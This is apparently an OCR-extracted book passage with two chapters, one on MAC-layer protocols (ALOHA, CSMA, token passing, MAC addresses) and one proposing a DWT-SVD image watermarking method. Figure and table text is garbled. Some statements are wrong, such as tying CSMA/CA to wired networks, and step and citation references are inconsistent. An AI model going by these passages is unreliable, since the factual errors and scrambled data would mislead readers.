Media access control (MAC) is one of the sub-layers of the data link layer (Layer 2) 
in OSI (open systems interconnection) model. The MAC layer provides a unique 
id and controls the access mechanism of channels in order to interface with other 
nodes over shared channel by using MAC protocol. MAC address is very helpful 
for delivering a data packet over an electronic network, which is not possible in 
the case of postal addresses. Data encapsulation, including frame assembly before 
transmission, and frame parsing/error detection during and after reception are the 
two main duties of the MAC. 


Keywords: MAC layer, protocols, deterministic access, channelization, OSI 
model, deterministic access 


2.1 Introduction 


The Open Systems Interconnection Model (OSI Model) is a theoret- 
ical framework for describing the functions of a networking system. 
The connections between computing systems are classified into seven 
abstraction levels in the OSI reference model: Physical, Data Link, 
Network, Transport, Session, Presentation, and Application. The data 
link layer is divided into two sub-layers: Media access control (MAC) 
and Logical link control (LLC). MAC provides flow control and multi- 
plexing for device transmissions over a network. (LLC) provides flow 
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and error control over the physical medium as well as identifies line 
protocols. 


2.2 MAC Layer 


Medium access control (MAC) is a sub-layer of the data link layer pre- 
sented in the OSI model. MAC layer allows having control of the devices 
which can be accessed on the share network [1]. To ensure that all devices 
may access the network within a period, some level of control is required, 
initiating in allowable access and response times. It can be characterized in 
different ways which are described below. 


2.2.1 Centralized Control 


A centralized controller polls devices to find out when each station 
is allowed to access and transmit data. Stations transmit when they are 
asked to or when a request for station broadcasting is acknowledged and 
approved. Polling necessitates the transmission of control packets, which 
adds overhead and reduces throughput in comparison to the raw band- 
width available. 


2.2.2 Deterministic Access 


In the deterministic access method, each station has the assurance of being 
able to communicate within a certain time frame. Deterministic access is 
also known as non-contentious, because the devices do not contend for 
access; rather access is controlled on a centralized basis. 


2.2.3. Non-Deterministic Access 


Non-deterministic media access control puts access control liabilities 
on the individual stations. This is commonly addressed as Carrier Sense 
Multiple Access (CSMA). It is decentralized, which is used in Ethernet and 
other bus oriented LANs, before access to the medium to send data [2]. It 
is of two types: CSMA/CD and CSMA/CA. In CSMA each station checks 
if there is any collision in the shared medium. 
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2.3 Functions of the MAC Layer 


The MAC layer provides the shared link addresses: all devices have a 
unique id of 48 bits (6 bytes) known as the “MAC address”. The first three 
bytes describe the manufacturer of the network equipment. As a result, 
any network adapter (WLAN, Ethernet, or other) has a MAC address that 
is supposed to be unique. Sending packets on the network with the device's 
MAC address can be used to communicate with it [3]. 

The MAC address is defined the same way in other IEEE-specified pro- 
tocols as Ethernet or Token Ring. This permits stations from various types 
of networks to communicate with one another: all that is required is the 
use of “bridges” to connect different networks (bridge). MAC also initiates 
the frame transmission and recovery from transmission failure. 


2.4 MAC Layer Protocol 


MAC layer protocols operate at layer 2 that is Data Link Layer as shown in 
Figure 2.1 and its sub layer is shown in Figure 2.2. When multiple stations 
want to transmit data in sharable link like bus topology at same time, there 
is a chance of collision, which can lead to wastage of data [4]. Therefore 
to reduce the collisions different types of MAC protocols are required [5]. 


Layer7 Application 
Layer 6 Presentation 
Layer 5 Session 
Layer 4 Transport 
Layer 3 Network 
LLC 
Layer 2 Data Link aac 
Layer 1 Physical 


Figure 2.1 OSI model representing MAC layer. 
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LLC 802.2 


MAC 802.11 (Wi-Fi) MAC 802.3 (Ethernet) Pee | 


Figure 2.2 Sub-layer of data link layer. 


MAC layer protocols are classified as follows: (shown in Figure 2.3) 


MAC Layer Protocols 
Controlled Access Protocols 


Reservation 


Random Access Protocols 


ALOHA 
CSMA 


CSMA/CD 
CSMA/CA 


Channelization Protocols 


FDMA 
CDMA 
TDMA 


Polling 


Token Passing 


Figure 2.3 Classification of MAC layer protocols. 


2.4.1 Random Access Protocol 


In this kind of protocol all stations have the same priority [6]. Depending 
on the status of the medium, any station can transfer data in sharable link 
whenever they are ready. It has two features: 


e They can send data any time without fixed timing. 
e ‘There is no set order in which stations deliver data. 


It is further classified as: 


(a) ALOHA: 

This protocol is based on LAN, but it can also be used for 
shared media. Multiple stations might broadcast data at the 
same time, which might result in collisions and jumbled data. 
- Pure Aloha: 

In pure aloha, any station can transmit data at any time. If data 
is transmitted from one station to another station without any 
collision then acknowledgement (ack) is being sent. If ack is 
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Figure 2.4 Pure Aloha. 


not received for a given time then station waits for a certain 

time, say Tb, before resending the data. Because different sta- 

tions take varying amounts of time to wait, the chances of 

another accident are reduced as shown in Figure 2.4. 

- Slotted Aloha: 

In slotted aloha, unlike pure aloha, we split the time into slots 

and any transmission will only occur at the beginning of each 

slot; otherwise stations have to stay for next available slot. This 

lowers the chances of an interference as shown in Figure 2.5. 

(b) CSMA - In CSMA each station first senses the shared channel 

whether it is busy or not and according to that it transmits the 
data. It reduces the collision to a large extent. It transfers data 
if the channel is idle; else, it waits for the channel to become 
idle. However, because of the propagation delay, there is still a 
probability of a collision in CSMA. 


: Vulnerable period 
Station 1 for slotted ALOHA 
Station 2 > 
Station 3 y i ‘ Reference 
Station 4 | | — Packet 
Station 5 
Station 6 - 


Ls % 7 4 
Time (shaded slots indicate collisions) Vulnerable period for 


pure ALOHA 


Figure 2.5 Slotted Aloha. 
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CSMA access modes - 

1-persistent: In this method, node continuously sense the medium 
whether it is busy or not. If it senses medium is not busy it will 
transmit the data. Worst case can occur when each station senses 
the medium at the same time and it is not busy, node will transmit 
the data immediately and chances of collisions will be severe. 
P-persistent: In this method node doesn't send the data imme- 
diately when the shared medium is idle, it transmits data with 
probability p which have value between 0 to 1; otherwise it will 
become 0-persistent at p equals to 0 and 1-persistent at p equals 
to 1. Wi-Fi and packet radio technologies both use it. 
O-persistent: The importance of nodes is determined ahead of 
time, and transmission takes place in that order. In this method 
node waits for some random time if the medium is busy. And 
after that time it again senses the medium. Collisions will be 
less compared to 1-persistent. 

(c) (CSMA/CD (collision detection)) — The CSMA technique does 
not specify what should be done in the event of a collision. To 
deal with collisions, the carrier sense multiple access with colli- 
sion detection (CSMA/CD) method is added to the CSMA algo- 
rithm. The size of a frame in CSMA/CD must be large enough 
for the sender to identify a collision while sending the frame [7]. 

Assume that a station successfully sent data packets to their 
destination; nevertheless, this is only the best case scenario; 
thus, we must consider the worst case situation, in which there 
will be conflict slots as shown in Figure 2.6. Contention slots are 
those that, due to a collision, are unable to transmit their travel. 

(d) CSMA/CA (collision avoidance) - The sender receives acknowl- 
edgement signals as part of the collision detection procedure. The 
data is successfully delivered if there is just one signal (its own) 
and collision will happen for two signals. In wired networks, 
however, this is not the case; hence CSMA/CA is employed. 


Tp 


Tt 
A 


2Tp 


Figure 2.6 Assume A station communicated data but collided, wasting 2Tp in the worst- 
case scenario, and then some station B discovered a way to transfer the data, which took. 
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CSMA/CA avoids collision by: 

Inter-frame space — The station checks whether the shared medium 
is busy or not and ifit is free, it does not broadcast data right away so 
that it can reduce the collision. It waits for a period of time known 
as Inter-frame space. After that, it checks to see if the medium is still 
idle. The length of the IFS is determined by the station's priority. 
Contention Window - This refers to the quantity of time that 
is split up into equal slots. When the transmitter is prepared 
to transfer data, it selects a random number of slots as the 
hold time. If the medium becomes busy, the procedure is not 
restarted in its entirety; rather, the timer is restarted when the 
medium becomes free again. 

Acknowledgement - If the sender does not receive acknowl- 
edgement before the timer expires, the data is resent. 


2.4.2 Controlled Access Protocols 


In this method, to establish which station has the authority to send, the sta- 
tions exchange data. To avoid interference over shared link, it only enables 
one station to send at a time. 

The three methods of these protocols are as follows: 


Reservation 
Polling 
Token Passing 


(a) Reservation - A station must use the reservation mechanism to 
generate a reservation before transferring data. 

The reserve period is divided into N slots if there are N stations, 
and one slot is assigned to each station. If station 1 has to transmit 
the data, at that time other stations are restricted to take action. In 
general, by adding a 1 bit into ith slot, ith station can advertise that 
it has a frame to deliver. Each station knows which stations want to 
transmit once all N slots have been examined. 

The next reserve interval begins when the transmission of 
data has ended. Therefore it reduces the chances of collision as 
everyone knows who will be next. This concept is explained by 
the following Figure 2.7. 

(b) Polling - The polling procedure is analogous to a roll call in 
class. A controller, like the instructor, transmits the data to 
each station in turn. One serves as the primary station (con- 
troller), while the others serve as subsidiary stations. The role 
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12345 12345 12345 
Reservation 
Frame 


Figure 2.7 Five stations and slot reservation frame. 


of a controller is that all data should exchange through it. The 
address of the node being selected for access is included in the 
message sent by the controller. 

Despite the fact that all nodes get the message, only the one 
to whom it is addressed responds and provides data. A “poll 
reject” (NAK) message is usually returned if there is no data. 
The polling messages have a large overhead, and the controller's 
reliability is highly dependent as explained in Figure 2.8. 

(c) Token passing - In this method, stations are linked with each 
other in the form of ring and managed by tokens as shown in 
Figure 2.9. A token consists of particular patterns and pass on 
from one station to another in fixed order. In Token bus, each 


Secondary 


| Peary Secondary 


-_ 
| PollSeect 
a an 


Figure 2.8 Polling process. 
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station uses the bus to deliver tokens to the next station in a 
predetermined order. 

The token denotes the ability to send in all conditions. When a 
station receives the token and has a frame waiting to be trans- 
mitted, it might send it before sending the token to the next 
station. It just passes the token if there is no awaiting frame. 
Each station must wait for all P stations to send the token to 
their neighbours, as well as the other P - 1 station to broadcast 
a frame if they have one, after transmitting a frame. There is a 
problem with token duplication or loss, as well as the insertion 
and removal of additional stations, which must be solved in 
order for this scheme to function correctly and reliably. 


2.4.3 Channelization 


Channelization is categorized in terms of frequency, time and code. They 
are explained as follows: 


(a) Frequency Division Multiple Access (FDMA) - It provides 
chunks of frequency spectrum to each user for data transmis- 
sion. Generally the data is transmitted at baseband and modu- 
lated at varying radio frequencies. 

(b) Time Division Multiple Access (TDMA) - It allows multiple 
users to share a common frequency band by allocating different 
time slots. It is used in GPRS, GSM, etc. [8]. 

(c) Code Division Multiple Access (CDMA) - All transmissions are 
carried on a single channel at the same time. There is no such thing 
as bandwidth or temporal division. Similarly, data from many sta- 
tions can be delivered in several coding patterns at the same time. 


2.5 MAC Address 


The physical address that distinctively recognizes each device on a net- 
work is known as the MAC address shown in Figure 2.10. We need two 
addresses to communicate between two networked devices: an IP address 
and a MAC address. It’s assigned to each device’s NIC (Network Interface 
Card) that may connect to the internet [9]. 

Media Access Control, often known as Physical Address, Hardware 
Address, or BIA, is an acronym for Media Access Control (Burned in 
Address). It has a globally unique MAC address, which implies that no two 
devices can have the same MAC address. It is expressed in a hexadecimal 
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Token passes around the ring 


from station to station 


Figure 2.9 Token passing process. 


<—_ 6 octets ——————— 


1st octet |2nd octet] 3rd octet | 4th octet} 5th octet | 6th octet 
or 


<—<— 3 octets ———> 3 octets —————_ > 
Organisationally Unique Network Interface Controller 
Identifier (OUI) (NIC) Specific 


fr [os Jos [oe] f= [> ]o0] 


0: unicast 

1: multicast 
0: globally unique (OUI enforced) 

1: locally administered 

Figure 2.10 48-bit MAC address structure. 

format on each device, such as 22:0B:42:8C:12:72. It is provided by the 


device’s manufacturer at the time of manufacture and is built in the device's 
NIC, which cannot be modified ideally. It’s 12-digits long and 48 bits long, 
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with the first 24 bits utilised for OUI (Organization Unique Identifier) and 
the remaining 24 bits for NIC/vendor-specific information [10]. 


2.6 Conclusion and Future Scope 


In this chapter many MAC protocols have been explained. If we want 
improve the performance many other protocols are also feasible [11]. 
Interaction with the MAC layer can provide congestion management 
information to other layers as well as improve routing decisions. However, 
improving the MAC protocol can enhance communication reliability and 
energy efficiency dramatically. The field of wireless sensor networks (WSN) 
MAC protocols has gotten a lot of attention from the scientific commu- 
nity [12]. WSN MAC protocol classification is introduced with the goal of 
improving performance which can be a topic of future research. At the end, 
open research questions are suggested. 

Future purpose should concentrate on achieving to reduce delay, assur- 
ance in service quality, reducing interference and, finally, optimising power 
consumption; a set of needs common to wireless sensor networks [13]. 
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Abstract 

The security of the watermark against unauthorized detection is a major point of 
concern. If some illicit user can detect the watermark from the watermarked image 
then he can very easily remove that watermark by making the image copyright- 
free or he may also remove the originally embedded watermark and insert his 
watermark. In both ways, the illicit user can diminish the original owner's copy- 
right over the image. This leads to the requirement of methods that can provide 
security against the unauthorized detection of the watermark. To find the solution 
to this problem, a greatly secure grayscale image watermarking algorithm that uses 
DWT-SVD approach has been proposed. In this work, a balance between robust- 
ness and imperceptibility has also been retained. It is apparent that the proposed 
algorithm provides improvised robustness and imperceptibility and the method is 
providing security to the watermark as well. 
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3.1 Introduction 


In the past few decades, the popularity of internet technology has increased 
enormously. It has led to easiness in communication and dissemination of 
digital documents such as image, video, text, and audio. However, the very 
conveniently available image processing tools make it even easier to dupli- 
cate, modify, and redistribute such multimedia data. These acts of copying, 
modifying and redistribution of digital data violate the intellectual prop- 
erty rights of the multimedia data owner. Hence, copyright protection of 
digital data has emerged as a potential area of research in the current sce- 
nario [1-4]. To address the issues related to copyright protection of multi- 
media data, a large number of data security techniques are proposed in the 
literature, and these are illustrated in Figure 3.1. Digital watermarking has 
evolved as a very effective information security technique for copyright 
protection or copyright authentication. Broadly, these approaches can 
be characterized as the Cryptography approach and Information Hiding 
approach [5]. In cryptographic methods, the message has been changed to 
a higly protected format which can be decrypted and recuperated by certi- 
fied users only. But the disadvantage of this technique is that after decod- 
ing of the message, it does’t remain secure. Also, the procedure involved 
in cryptography is more complex than information hiding. Watermarking 


Information Security Method 


: 


: | 
Cryptography Information Hiding 
Vv 
u : 
Waltermarking Steganography 
Vv 
Vv Vv Vv v 
Document Working Domain Human Perception Reversibility 
¥ v 
2 re a 2 ¥ — vy 
g) [S| js||8] | 5 2 Fa a| | 
i 2] |2|/3 & § 3 i 3 B 
£ </|s & 2 2 2 g g 
- Vv a = 
v-.—~™~—OCWNV. 5 
Robust Fragile 


Figure 3.1 Classification of information hiding methods. 
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and Steganography techniques for information hiding are less complex and 
secure than cryptography techniques. 

In Steganography, the expected recipient can only recognize the presence 
of hidden information. However; most users can't even detect the presence of 
a message, which hinders its use in multimedia-based applications. In stegan- 
ography, the message and watermark need to be uncorrelated to each other. 
However, in watermarking-based encryption technique message and water- 
mark may or may not be correlated to each other. 

The watermark embedding approach used in steganography and water- 
marking method makes the two technques different. In watermarking 
technique, the embedded watermark may be visible or not but in stegan- 
ography technique the watermark is always invisible. Figure 3.2 highlights 
the main features of three techniques - steganography, cryptography and 
watermarking. Among these three, watermarking is the most widely used 
in multimedia-based applications, for copyright protection or copyright 
authentication. 

Imperceptibility and robustness are the two key parameters that decide 
the performance of the digital watermarking algorithm. A trade-off between 
the two parameters needs to be maintained as these are interrelated. There 
are numerous approaches proposed in the literature that address this issue. 
However, there is no unique digital watermarking method available that 
provides security against all possible threats to multimedia data [6, 7]. 


Information Hiding Methods 


+ Itisamethod to modify text + Itisamethod to hide + Itisa method to embed an identifier in 
or other form of information information. some hidden way in a file (text, audio, 
by transforming the sourceto + The encrypted message is video, image etc.). 

a target file. visible to the all so itisone + One to many communication. 

+ One to one communication. to many Communication. + Watermarking concerns potential 

+ Invisible. + Change the data so it is not removal by a pirate. 

+ Hides the message. readable. + We can design both fragile or robust 

+ Mainly concerned with + Once decrypted datacanbe — watermarking system as per the 
detection of the hidden easily redistributed. application requirements. 
message. + Try to protect the content + Visible/Invisible. 

of a message. + It's goal is authentication/protection of 


the copyright of source data. 


Figure 3.2 Difference between steganography, cryptography, and digital watermarking. 
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3.2 Literature Review 


A watermark can be embedded in an image either in spatial domain or in 
transform domain. The pixel values of the host image are directly altered 
in watermarking in spatial domain but the only advantage is that it is very 
simple to implement and provides high data capacity. In this technique, 
security can be enhanced by embedding a watermark multiple times that 
will help the survival of the watermark in case of attacks. However, spatial 
domain techniques of watermarking suffer from image processing attacks 
like compression, rotation, etc. [1, 14]. 

Another way of embedding a watermark is transform domain. In this 
technique, host image and watermarked image are transformed in fre- 
quency domain, followed by embedding watermark coefficients in the 
host image keeping in view the human visual system (HVS). Transform 
domain techniques have shown better robustness and imperceptibility 
compared to spatial domain techniques [8-10]. 

Various transformation techniques like Discrete Fourier Transform 
(DFT) [10], Discrete Cosine Transform (DCT) [11], Discrete Wavelet 
Transform (DWT) [12, 13], fractional Fourier Transform (FrFT) [14], 
Discrete fractional Cosine transform (DFrCT) [15], some linear algebra 
transform methods such as singular value decomposition (SVD) [16], and 
QR decomposition [17], are executed to accomplish improved impercepti- 
bility and robustness in digital watermarking [18-24]. 

I.J. Cox (1997) [1] has given a DCT-based non-blind digital watermark- 
ing algorithm. C.T. Hsu et al. (1998) [25] suggested a multi-resolution 
watermarking algorithm that uses sub-band DWT coefficients of the host 
image and watermark images. The algorithm showed good robustness and 
imperceptibility for common image processing attacks but suffered with 
geometric attacks. 

C.T. Hsu et al. (1999) [16] proposed an algorithm in which the middle- 
frequency DCT coefficients are explored for embedding the watermark 
without affecting the low-frequency coefficients. 

Wen-Nung Lie et al. (2000) [26] proposed a robust algorithm that gives 
better performance for different geometric and non-geometric attacks by 
calculating coefficients DCT inserting watermark coefficients in its middle 
band and also during the extraction of watermark the host image is not 
required. When compared with [27] it showed that the algoritm is compu- 
tationally expensive and couldnt sustain cropping attacks. 

M. Barni et al. (2001) [28] developed an algorithm that is based on 
a pixel-wise masking model which uses HVS properties to improve 
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watermark indistinctness and robustness. Pixel by pixel masking is per- 
formed to compute the local brightness and texture; however, only this 
information is not at all sufficient for brightness or texture calculation. 

W.C. Chu (2003) [18] proposed a subsampling technique that used ran- 
dom perturbation of DCT coefficients that belong to various sub-images. 
It’s a blind watermarking algorithm. The algorithm shows good perfor- 
mance, better robustness compared to re-watermarking, collusion attacks, 
noise addition and high pass filtering; however, it suffers compression 
attacks. 

S.U. Liyun et al. (2006) [29] proposed Fuzzy c-means-based adaptive 
image watermarking algorithm for classifying image blocks into two cate- 
gories. To fine-tune the power of the watermark frequency masking tech- 
nique is used. The algorithm showed good performance against various 
image processing attacks. 

V.S. Verma (2013) [30, 31] has suggested an algorithm in which the dif- 
ference between LWT coefficients is taken. Then randomly scrambling of 
CH3 sub-block sub-bands is done, followed by insertion of watermark into 
the obtained largest coefficients. This algorithm showed good robustness 
for different geometric and non-geometric attacks and also better visible 
quality in comparison to algorithms using the same methodology [32-35]. 

Singh et al. (2014) [36] proposed a new multi-transform-based robust 
watermarking scheme. The host image is transformed by applying DWT 
and HH sub-band is obtained, followed by DCT and then SVD to obtain the 
watermarked image. This algorithm used multiple transformations on the 
host imagemaking it complex. Ahmad et al. (2014) [37] proposed a three- 
level 2D DWT watermarking algorithm and in this LL sub-band coeffi- 
cients obtained by applying DWT to watermark image and the host image 
are used in the watermark embedding process. Algorithms performed well 
against various geometic attcaks at the cost of increased complexity. 

Rahman and Rabbi (2015) [38] proposed a watermarking algorithm for 
colored images that used DWT and SVD. Vaidya and Mouli (2015) [39] 
presented an adaptive watermarking algorithm that explored B&K meth- 
ods to estimate the scaling factor. Simulation results showed the superior- 
ity of the proposed algorithm compared to similar algorithms in [40, 41]. 

Jamal et al. (2016) [42] proposed a substitution box-based semi-fragile 
watermarking technique. DFT has been used to decompose the host image 
and a chaotic map is used to embed the watermark. 

A histogram-based robust image watermarking algorithm has been pro- 
posed in [43, 44]. The feature points from the color image are extracted 
using the probability density-based features. Algorithm showed better per- 
formance when compared with other similar algorithms in [45-48]. 
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Lei et al. (2017) [49] proposed a robust watermarking technique that 
combines multiple watermarks while embedding. Singh et al. (2017) 
[51] pooled different transformation methods - Contourlet Transform, 
Redundant DWT and SVD to embed the watermark and showed better 
robustness and imperceptibility compared to other similar methods like 
[50, 52, 53]. 

Amini (2017) designed a blind watermark decoder by using HMM [54]. 
Substantial improvements in robustness have been shown compared to 
similar techniques offered in literature [55, 56]. Issue of FPP of SVD has 
been addressed by Makbol et al. (2018) [57] and he considered existing 
DWT-SVD and RDWT-SVD algorithms but with FPP. 

Zhou et al. (2018) [58] proposed DWT, DCT and DFRNT based water- 
marking algorithm which is extremely secure. A DWT and encryption 
based watermarking algorithm for copyright protection of images has 
been proposed by Ambadekar et al. (2018) [59]. Recently, Artificial Neural 
Network and Machine learning based algorithms [60-66] have been sug- 
gested to improve the performance of conventional watermarking algo- 
rithms. The grouping of watermarking techniques, metrics for analyzing 
the performance of the digital images has also been presented. 


3.3. Design Issues 


There are certain design issues [11] in Digital watermarking systems such 
as robustness against various attack situations, distortion and visual qual- 
ity, working domain, Human Visual System (HVS), a balance between 
imperceptibility, robustness, computational cost, etc. These issues are dis- 
cussed in detail below. 


3.3.1 Robustness Against Various Attack Conditions 


The attackers in a digital watermarking system can be classified as a Passive 
attacker and an active attacker. The passive attacker doesn’t harm the water- 
marked image directly; instead, he just detects the presence or absence of 
the watermark. However, the active attacker will extract the watermark and 
will try to alter or destroy the watermark. So, the active attacker can alter 
the copyright over the watermarked image. In actual scenarios, the trans- 
mitted watermarked image travels through wired or wireless channels, and 
in this course, it faces several image processing or geometric attacks [10]. 
Figure 3.3 shows the possible cracking of the watermarking system by pas- 
sive and active attackers. It has been observed that most of the available 
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Figure 3.3 Breaking watermarking system by possible attackers. 


watermarking methods are resistant to compression, filtering, and some 
other conventional image processing attacks but they lag in providing 
enough robustness against geometric attacks. 

Hence, it becomes an important issue to design a watermarking system 
that can provide robustness against geometric attacks as well. Along with 
robustness, it is also very important to make the watermark secure against 
unauthorized detection and hence alteration. 


3.3.2 Distortion and Visual Quality 


The visual quality of the host image is directly affected upon insertion of 
the watermark. The distortions introduced during the watermark inser- 
tion process and due to the intentional/unintentional attacks across the 
channel are generally asymmetric in nature, hence there is a wide range of 
Peak Signal to Noise Ratio (PSNR). It helps in evaluation of imperceptibil- 
ity offered by any watermarking scheme. Hence the imperceptibility of the 
watermarked image is proportional to the PSNR attained. 
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3.3.3 Working Domain 


The most significant bit (MSB) and least significant bit (LSB) are the two 
most widely adopted spatial domain watermarking methods. Figure 13.4 
showcases a sample of insertion of watermark bits over the host image, the 
generation of watermarked bits, and finally, the major changes introduced 
extracted watermarking bits using the LSB-based watermarking method 
in the spatial domain [67]. The major advantage of LSB-based water- 
marking schemes over MSB-based watermarking schemes is that the LSB 
watermarking introduces less distortion as compared to MSB watermark- 
ing schemes. Spatial domain watermarking methods are computationally 
less expensive and easy to implement but these methods offer much less 
robustness against the imposed attacks, low imperceptibility, and less secu- 
rity to the watermark as compared to the transform domain watermarking 
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Figure 3.4 An example of LSB Spatial Domain Watermarking [69]. 
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methods. In transform domain methods, instead of modifying the pixels 
directly, the watermark is inserted on the transformed coefficients of the 
host image. 


3.3.4 Human Visual System (HVS) 


The visual quality or the imperceptibility parameter in the digital image 
watermarking methods can be achieved by exploiting the features of the 
HVS while designing the watermarking system. It has been observed that 
the multi-resolution property of Discrete Wavelet Transform (DWT) 
makes it similar to HVS [68]. Hence, where the imperceptibility parameter 
is an important parameter in a watermarking system DWT is preferred. 


3.3.5 The Trade-Off between Robustness and Imperceptibility 


It is desired that the designed watermarking system should be capable of 
providing high imperceptibility, robustness towards the attacks, high fidel- 
ity, and security [70, 71]. The watermarking system should be able to insert 
a maximum capacity watermark without severe deterioration in the imper- 
ceptibility of the host image and ensure removal of watermark from the 
host image shouldn't be easy. The fundamental issue in the design of a dig- 
ital image watermarking system is to achieve a balance between impercep- 
tibility and robustness because these parameters conflict with each other. 


3.3.6 Computational Cost 


Computational cost or time complexity is another major aspect of digital 
image watermarking. The designed watermarking scheme should be able 
to execute efficiently by consuming minimum execution time. To maintain 
a balance between robustness and imperceptibility various available GA or 
optimization techniques can be used. But these optimization methods take 
much execution time, hence designing a computationally efficient digital 
watermarking method is a very important design issue [71]. 


3.4 A Secure Grayscale Image Watermarking Based 
on DWT-SVD 


In this section, a grayscale image watermarking method using DWT-SVD 
is explained. While designing this watermarking method the design issues 
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such as security of the watermark from any unauthorized detection, high 


robustness, and high imperceptibility are taken care of. 


Watermark Insertion Process 


Let an image I[x, y] be the original grayscale host image. The watermark 
image is a grayscale image of size M x N. the low frequencies of the host 
image has been extracted by using 2 level RDWT and the SVD has been 
applied over those low frequencies. The flowchart of the algorithm has 
been depicted in Figure 3.5 and the steps involved in the implementation 


of this algorithm are as discussed below. 
The steps involved in the watermark insertion process: 


1. 


Insert the encryption key. 


2. 2 level DWT decomposition is applied over the original host 


image to extract all the four sub-bands LL, LH, HL, and HH. 


. SVD is applied over the LL sub-band to extract S, U, and V 


matrices from the LL sub-band of the host image. 


. Take the S matrix obtained in step 2 for the watermark inser- 


tion process. 


. 2 level DWT decomposition is applied over the original 


watermark image to extract LL, LH, HL, and HH sub-band. 


. SVD has been applied over the LL sub-band to extract S, 


U, and V matrices from the LL sub-band of the watermark 
image. 


. Take the S matrix obtained in step 5 for the watermark inser- 


tion process. 


. Select the position in the S$ matrix of the host image. 
. Apply watermark insertion algorithm. The resultant image 


would be the watermarked image. 


10. Apply image processing attacks over the watermarked image. 


The steps involved in the watermark extraction process are as follows: 


1. 


Check the encryption key. If the key matches go to step 2 of 
the extraction process, else flash the message “Not an autho- 
rized user’. 


. Over the distorted watermarked image obtained from step 8, 


apply the watermark extraction process. 


. Retrieve the watermark from step 1 of the extraction process. 
. Compare the extracted watermark with the original 


watermark. 
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Figure 3.5 The flowchart of proposed algorithm. 


5. Calculate SSIM for the comparison of the step above. This 
comparison defines the robustness of this algorithm. 


3.5 Experimental Results 
The simulation results with their analysis and comparison with the state- 


of-the-art methods are demonstrated in this section. The efficiency of this 
proposed method in terms of robustness and imperceptibility is evaluated 
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with the help of standard IQA parameters such as PSNR and NC. PSNR 
has been used to define the offered imperceptibility whereas NC defines 
the robustness of the offered method. All the simulations are performed 
over Intel(R) Core i7-4600U CPU @ 2.10GHz Windows 10 with 8 GB 
RAM in MATLAB 2017 Platform. Haar wavelet is used to extract the fea- 
tures to achieve imperceptibility in the watermarking system. Standard test 
images Cameraman and Lena in .tiff format are used as the original host 
images and the letter A image in .tiff is used as the watermark. Figure 3.6 
depicts the host and watermark image used in the experimental study for 
the analysis of the proposed method. The cameraman and Lena image both 
are 256X256 whereas the watermark image is of the size 64X64. 

The watermarked host images (Cameraman and Lena) without attack, 
along with their extracted watermark and attained values of PSNR and NC 
are presented in Figure 3.7. It is evident for this figure that PSNR value of 
52.78 and 54.82 is achieved for the Cameraman and Lena image, respec- 
tively, which shows that the imperceptibility offered by this proposed 
method is quite high when the watermarked image is not attacked. 

To validate the proposed watermarking method both the host images 
are exposed to attacks blurring, cropping, the addition of Gaussian noise, 
resize, salt & pepper noise, rotation, and sharpening. The effect of imposed 
attacks on Lena image is shown in the first column of Figure 3.8; the sec- 
ond and third column of this figure show the extracted watermark from the 
attacked watermarked image and the value of NC, respectively. The value 


Figure 3.6 (a) Original host image Cameraman, (b) Original host image Lena, and 
(c) watermark image. 
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(b) 


PSNR: 54.82, NC: 0.9983 


Figure 3.7 (a) Watermarked Cameraman image and extracted watermark when 
non-attacked, with PSNR and NC value (b), Watermarked Lena image and extracted 
watermark when non-attacked, with PSNR and NC value. 


of NC determines the robustness of this method. It can be seen that a very 
high value of NC (above 0.90) is achieved for the attacks Gaussian noise, 
salt & pepper noise, resize, and sharpening, and for the attacks cropping 
and rotation NC value is 0.8922 and 0.8843 which is also practically fea- 
sible to provide robustness. However, this proposed method is not able to 
attain a high NC for the rotation attack. For rotation attack, the value of 
NC is 0.6970. 

After analyzing the efficiency of the proposed technique in terms of 
robustness and imperceptibility, finally, the efficacy of the recently pro- 
posed method is evaluated by equating this method with other state-of- 
the-art methods [59 and 60]. The comparison results are presented in 
Tables 3.1 and 3.2, and the summary of this comparison is as discussed 
below: 

Firstly, Table 3.1 shows that the PSNR value obtained by using the pro- 
posed method is higher than the techniques offered in [59, 60]. For the 
Cameraman image these methods can attain a PSNR value of 41.57 dB, 
whereas our proposed method is attaining the value of PSNR as, 52.78 dB 
for the same cameraman image. This improvement in attained PSNR from 
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[59] hold for the Lena image as well. We have achieved a PSNR value of 
54.82 dB for the Lena image, which is a significant improvement in PSNR 
from [59 and 60]. 

Secondly, we can observe from Table 3.2 that the NC values obtained 
using the proposed method are higher than the methods listed in [10] 
against the image processing attacks. In this table the NC values for the 
non-attacked watermarked image (for both Cameraman and Lena image) 
and the same watermarked image when exposed to various attacks like 
blurring, cropping, the addition of Gaussian noise, salt & pepper noise, 


Extracted 
Imposed Attack Watermar _ 
Imposed Attack Watermark NC 


BLURRING 


A 0.6970 
zw, 


Imposed Attack Extracted NC 
Watermark a 
CROPPING 


A 0.8922 


{b) i 
GAUSSIAN NOISY 


A 0.9921 
a ®. 


Figure 3.8 (a) Blurring attack on Lena image, (b) cropping attack on Lena image, 
(c) addition of Gaussian noise i Lena image. (Continued) 
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SALT & PEPPER 


A 0.9401 


Imposed Attack Extracted NC 
Watermark aaa 
RESIZE 


A 0.9401 


A 0.8843 


Figure 3.8 (Continued) (d) addition of Salt & Pepper noise in Lena image, (e) resize of 
Lena image, (f) rotation of Lena image, with their respective extracted watermarks and 
attained NC values. 


Table 3.1 PSNR values for the Cameraman and Lena image. 


The result obtained The result obtained 
by the approach by the approach 
presented in [59 presented in [59 | Proposed Proposed 


and 60] and 60] method method 


41.57 45.9 52.78 54.82 
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Table 3.2 NC values for the Camraman and Lena image. 


The result The result 
obtained obtained 
by the by the 
approach approach Proposed Proposed 
in [3, 13] in [3, 13] method method 


Images/ Cameraman Lena Cameraman | Lena 
Attacks 


0.9990 0.9845 0.9999 0.9983 
0.6108 0.6658 0.6576 0.6970 


Cropping 0.7140 0.6672 0.9441 0.8922 


Gaussian 0.9929 0.9702 0.9579 0.9921 
Noise 
0.8918 0.8726 0.9640 0.9401 


0.7466 0.7713 0.9640 0. 0.9401 | 
Sharpening 0.7942 0.7741 0.8657 0.8843 
0.9636 0.9517 0.9737 0.9744 


resize, sharpening, and rotation is tabulated. Column 1 lists the state of 
the watermarked attack, i.e., whether unattacked or intentionally/uninten- 
tionally attacked. Column 2 lists the NC value for the Cameraman image 
using the method proposed in [7]. The NC values for the Lena image for 
the proposed methods in [10] is demonstrated in column 3 of this table. 
Columns 4 and 5 show the NC values of the Cameraman and Lena image 
obtained using the recently proposed method. From this table, it is evident 
that a high NC value for extracted watermark is obtained by using our 
proposed method. 

It is evident from Table 3.2 that high NC and hence high robustness 
can be achieved using this proposed method. This is due to the following 
reasons: 


1. We have selected low-frequency coefficients for the water- 
